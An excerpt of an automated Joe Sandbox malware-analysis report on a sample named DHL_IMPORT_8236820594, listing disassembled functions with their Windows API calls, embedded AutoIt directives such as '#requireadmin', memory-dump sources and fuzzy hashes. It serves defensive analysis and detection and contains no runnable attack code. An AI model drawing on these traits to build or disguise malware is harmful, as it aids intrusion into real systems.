                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 4014797782-2298589950
                                                                                          • Opcode ID: 462b35ea22b694ab4e02f3885098df572d921306af269e6181fcb5024bb4159f
                                                                                          • Instruction ID: 5ca3372ab0f959f5fe40201a84fbdd9e0df5544f6941063aa497675130965ff2
                                                                                          • Opcode Fuzzy Hash: 462b35ea22b694ab4e02f3885098df572d921306af269e6181fcb5024bb4159f
                                                                                          • Instruction Fuzzy Hash: D1215CB5600209AFEB10DF68DC95DBB3BADFB5A3A4B051059FA01DB361DB70EC51CA60
                                                                                          Function 008395AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                          • API String ID: 176396367-2734436370
                                                                                          • Opcode ID: 1bc1140b7644d038523ba753f59bed3ef6dbd2db18cde0b12dcdd4cf20e61c39
                                                                                          • Instruction ID: ee409e16c2a12da32adfcf006e1d77a5e05498b118beb28b84e1c8da96952be1
                                                                                          • Opcode Fuzzy Hash: 1bc1140b7644d038523ba753f59bed3ef6dbd2db18cde0b12dcdd4cf20e61c39
                                                                                          • Instruction Fuzzy Hash: C0212632205614A6C331AB249806FB77398FFE1314F504026FA9AD7241FBD9ED81C2D5
                                                                                          Function 008637B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00863840
                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00863850
                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00863876
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MoveWindow
                                                                                          • String ID: Listbox
                                                                                          • API String ID: 3315199576-2633736733
                                                                                          • Opcode ID: 6f3229ae9b8eaa3228de2911603b4ddd7377d1444385d50e63684b70d0d5421e
                                                                                          • Instruction ID: 2ddb56d6997e35e55441795986af441f48fc4af219156861efb1351b64dcc7c1
                                                                                          • Opcode Fuzzy Hash: 6f3229ae9b8eaa3228de2911603b4ddd7377d1444385d50e63684b70d0d5421e
                                                                                          • Instruction Fuzzy Hash: 6821BE72610218BBEF219F54DC85FBB376AFF89760F128124FA149B190C6B1DC5287A0
                                                                                          Function 008449F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00844A08
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00844A5C
                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,0086CC08), ref: 00844AD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: %lu
                                                                                          • API String ID: 2507767853-685833217
                                                                                          • Opcode ID: 733e9ac7ab95ffc6d28d2f5c87fb1a0b232d55bb5ad059e03550c9b53816eacf
                                                                                          • Instruction ID: 6f1285b80a5852d8f68ebd8da8dcedbf557cfc555c5f16c2927749e9388bb0cf
                                                                                          • Opcode Fuzzy Hash: 733e9ac7ab95ffc6d28d2f5c87fb1a0b232d55bb5ad059e03550c9b53816eacf
                                                                                          • Instruction Fuzzy Hash: 7A313E75A00219AFDB10DF64C885EAA7BF8FF09308F1480A5E909DB362DB75ED45CB61
                                                                                          Function 008641EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0086424F
                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00864264
                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00864271
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: msctls_trackbar32
                                                                                          • API String ID: 3850602802-1010561917
                                                                                          • Opcode ID: 96e62e5d55b3551e954aab72f21348e9ec12ff178399e11c4211931f4ea5b76e
                                                                                          • Instruction ID: 1ad2da67972f2655f3e60c4f456009a23dd97c8baf5185b938f2dddc7e9880b4
                                                                                          • Opcode Fuzzy Hash: 96e62e5d55b3551e954aab72f21348e9ec12ff178399e11c4211931f4ea5b76e
                                                                                          • Instruction Fuzzy Hash: 3F110231240208BEEF205F28CC46FAF3BACFF95B64F121124FA55E61A0D2B1DC619B20
                                                                                          Function 00832F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                            • Part of subcall function 00832DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
                                                                                            • Part of subcall function 00832DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
                                                                                            • Part of subcall function 00832DA7: GetCurrentThreadId.KERNEL32 ref: 00832DDD
                                                                                            • Part of subcall function 00832DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4
                                                                                          • GetFocus.USER32 ref: 00832F78
                                                                                            • Part of subcall function 00832DEE: GetParent.USER32(00000000), ref: 00832DF9
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00832FC3
                                                                                          • EnumChildWindows.USER32(?,0083303B), ref: 00832FEB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                          • String ID: %s%d
                                                                                          • API String ID: 1272988791-1110647743
                                                                                          • Opcode ID: e39b3a9e691dbd9ac88c28cb0de61d18ba0d3f13fef7c9321045377451a0a5a7
                                                                                          • Instruction ID: 2c524fa2049c6f858331f1615a58ec6f658272bfc92e5d6c894f840a77a59071
                                                                                          • Opcode Fuzzy Hash: e39b3a9e691dbd9ac88c28cb0de61d18ba0d3f13fef7c9321045377451a0a5a7
                                                                                          • Instruction Fuzzy Hash: FF1190B1600209ABCF157F648C99EED376AFFD4304F04407AF909EB252DE7499458BB1
                                                                                          Function 00865882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658C1
                                                                                          • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 008658EE
                                                                                          • DrawMenuBar.USER32(?), ref: 008658FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$InfoItem$Draw
                                                                                          • String ID: 0
                                                                                          • API String ID: 3227129158-4108050209
                                                                                          • Opcode ID: 33db374be712c38ab5f04daae8a2a854ac6672c88c24640b1e14e18b7eaf6e31
                                                                                          • Instruction ID: 442e8366fcadf2a40cf52c9766e32f779f8fb567b7b029278d6886339c45a4b7
                                                                                          • Opcode Fuzzy Hash: 33db374be712c38ab5f04daae8a2a854ac6672c88c24640b1e14e18b7eaf6e31
                                                                                          • Instruction Fuzzy Hash: CD016D31500258EFDB219F11EC48BAEBBB4FB45364F118099E889D6151DF709A84DF31
                                                                                          Function 0083007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd49d8275389a2f5f8ccdfc3ce24aab2a6139bcf63e8ffb6432642246dcb8317
                                                                                          • Instruction ID: be6453b64d2bf07d39b469b0bb37c8d26886b9c9a5b636e398318e1451c418a1
                                                                                          • Opcode Fuzzy Hash: fd49d8275389a2f5f8ccdfc3ce24aab2a6139bcf63e8ffb6432642246dcb8317
                                                                                          • Instruction Fuzzy Hash: 3FC13975A0021AEFDB15CFA8C8A4AAEB7B5FF88704F208598E505EB251D771ED41CF90
                                                                                          Function 00803E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1036877536-0
                                                                                          • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                          • Instruction ID: b5e12762d8cde81483be5629e879db0b2db6403930f20f4a2e1f0776ef3e30b9
                                                                                          • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                          • Instruction Fuzzy Hash: A3A135B2A407869FEB61CF18CC917AEBBE8FF61350F14416DE685EB2C1C6389981C751
                                                                                          Function 0085342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInitInitializeUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 1998397398-0
                                                                                          • Opcode ID: 22fecee1a24ec77d420edf28b1781a3d2859ae9d108f81779bcdea351fa1e9f2
                                                                                          • Instruction ID: 23d9658cf26e00a2f0c61b20e2c7401486a7709ee058553cf438e5356c852187
                                                                                          • Opcode Fuzzy Hash: 22fecee1a24ec77d420edf28b1781a3d2859ae9d108f81779bcdea351fa1e9f2
                                                                                          • Instruction Fuzzy Hash: D8A11575604200DFC714DF28C485A2AB7E5FF88755F04895AF98ADB362DB34EE05CB92
                                                                                          Function 00830436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 008305F0
                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0086FC08,?), ref: 00830608
                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0086CC40,000000FF,?,00000000,00000800,00000000,?,0086FC08,?), ref: 0083062D
                                                                                          • _memcmp.LIBVCRUNTIME ref: 0083064E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 314563124-0
                                                                                          • Opcode ID: c9f9ad79853c730ba824661ddeeda9d1582056af33f9f07be02aadcdc08963cd
                                                                                          • Instruction ID: f94a948dbb7ba25e062323c407f0d8fa070083eeabf21dc29a71b03aa9503718
                                                                                          • Opcode Fuzzy Hash: c9f9ad79853c730ba824661ddeeda9d1582056af33f9f07be02aadcdc08963cd
                                                                                          • Instruction Fuzzy Hash: FB81E871A00209EFCB04DF94C994DAEB7B9FF89315F204598E516EB250DB71AE06CFA0
                                                                                          Function 00811391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID:
                                                                                          • API String ID: 269201875-0
                                                                                          • Opcode ID: 5bec2a14252278f4012680c7afba41af3a2a023026d477698953e1fedd8a9771
                                                                                          • Instruction ID: 3464cbdc5024c8923d4d9af86557ce486b403f35598606a3d7b12e75f9f723c8
                                                                                          • Opcode Fuzzy Hash: 5bec2a14252278f4012680c7afba41af3a2a023026d477698953e1fedd8a9771
                                                                                          • Instruction Fuzzy Hash: AA413B31600508ABDF216FFC9C4DAFE3AAEFF41770F240225F619D62D2EA7848815366
                                                                                          Function 00866278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(00D8BFE8,?), ref: 008662E2
                                                                                          • ScreenToClient.USER32(?,?), ref: 00866315
                                                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00866382
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                          • String ID:
                                                                                          • API String ID: 3880355969-0
                                                                                          • Opcode ID: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
                                                                                          • Instruction ID: 7059feeaeac48e56fc6d2f0eee7134c1b34703c584bce9142caef63ed708bd68
                                                                                          • Opcode Fuzzy Hash: 38c78445c54d124dc2c67dd8a25814032971e7dd8dfc2d4c14dfb09194a9c322
                                                                                          • Instruction Fuzzy Hash: 96515A70A00249EFDF10DF68D9809AE7BB5FB45364F11815AF815DB390E730AD91CB50
                                                                                          Function 00851AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00851AFD
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851B0B
                                                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00851B8A
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851B94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          • Opcode ID: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
                                                                                          • Instruction ID: 396804fe844967c5886d798f12f0c672338979d39c3cb83a78d6565f65bab624
                                                                                          • Opcode Fuzzy Hash: e5d421a671162574d2c98bc85cec6964e09a59fdb58356e200da381e88bb86c6
                                                                                          • Instruction Fuzzy Hash: 3241D334600200AFEB20AF24C88AF2977E5EB49718F548458F95A9F3D3D7B6ED41CB91
                                                                                          Function 0080B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
                                                                                          • Instruction ID: 6a65ac2818a85c865bf10eb9c230806fe118bcf0a397871c4df15bc0f214f1eb
                                                                                          • Opcode Fuzzy Hash: 9c18317c6e2f875d49f166705c40ffe4310e0ab5a13c25104c4974adfe57aca8
                                                                                          • Instruction Fuzzy Hash: 61410672A00708AFD7249F7CCC45BAEBBA9FF88710F10856AF145DB2D2D7719A418781
                                                                                          Function 008456D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00845783
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 008457A9
                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008457CE
                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008457FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
                                                                                          • Instruction ID: bd3dd247817aee64446702457546250015bbb6c31945ddc4421018f279d18574
                                                                                          • Opcode Fuzzy Hash: 46fd6d61122afa6e2c1d0af601e992331469d6c6434bce9003a30c8040e62a9a
                                                                                          • Instruction Fuzzy Hash: 7E41F439600615DFCB15EF15C548A5EBBF2EF89720B198499EC4AAB362DB34ED00CB91
                                                                                          Function 0080D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,007F6D71,00000000,00000000,007F82D9,?,007F82D9,?,00000001,007F6D71,8BE85006,00000001,007F82D9,007F82D9), ref: 0080D910
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0080D999
                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0080D9AB
                                                                                          • __freea.LIBCMT ref: 0080D9B4
